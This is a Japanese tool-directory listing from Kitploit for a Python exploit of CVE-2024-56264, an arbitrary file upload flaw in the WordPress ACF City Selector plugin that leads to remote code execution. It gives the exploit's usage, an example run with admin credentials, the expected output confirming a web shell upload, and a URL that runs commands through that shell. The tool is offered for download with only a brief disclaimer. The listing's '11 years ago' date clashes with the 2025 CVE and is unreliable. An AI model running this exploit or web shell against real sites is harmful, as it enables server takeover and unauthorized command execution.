Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-56264 — CVE-2024-56264 の Python エクスプロイト。WordPress ACF City Selector プラグイン 1.14.0 以下の任意のファイルアップロード脆弱性であり、ウェブシェルアップロードを介したリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/dpakmrya/cve-2024-56264
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

CVE-2024-56264 の Python エクスプロイト。WordPress ACF City Selector プラグイン 1.14.0 以下の任意のファイルアップロード脆弱性であり、ウェブシェルアップロードを介したリモートコード実行を可能にします。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-56264

WordPress ACF City Selector - 任意ファイルアップロードエクスプロイト (CVE-2024-56264)

概要

このリポジトリには、WordPress ACF City Selector プラグイン(バージョン <= 1.14.0)で見つかった 任意ファイルアップロード 脆弱性である CVE-2024-56264 のエクスプロイトが含まれています。この脆弱性により、攻撃者は脆弱なWordPressインスタンスに 悪意のあるPHPファイル(ウェブシェル) をアップロードし、サーバー上で任意のコマンドを実行できます。

CVE 詳細

  • CVE識別子: CVE-2024-56264
  • 公開日: 2025年1月2日
  • 影響を受けるプラグイン: ACF City Selector
  • 脆弱性のあるバージョン: <= 1.14.0
  • 影響: 無制限のファイルアップロードによるリモートコード実行 (RCE)

説明

ACF City Selector プラグインはアップロードされたファイルを適切に検証できず、攻撃者が制限を回避して任意のPHPファイルをアップロードすることを可能にします。悪意のあるPHPファイルがアップロードされると、攻撃者はリモートでシステムコマンドを実行でき、サーバー全体の乗っ取りにつながります。

必要条件

📌 依存関係

スクリプトを実行する前に、以下がインストールされていることを確認してください:

  • Python 3.x
  • requests モジュール(インストール: pip install requests)

必要な依存関係は次のコマンドでインストールできます:

root@kitploit:~
pip install -r requirements.txt

🚀 使用方法

エクスプロイトの実行:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

例:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

期待される出力

正常にエクスプロイトが成功すると、次のように表示されます:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

エクスプロイト後

成功した場合、アップロードされたシェルに以下のURLでアクセスします:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

これにより、サーバー上でのリモートコマンド実行が可能になります。

⚠ 免責事項

このスクリプトは教育および許可されたセキュリティテスト目的のみを意図しています。無断使用は違法であり、重大な結果を招く可能性があります。著者はこのエクスプロイトの誤用について一切の責任を負いません。

ツールをダウンロード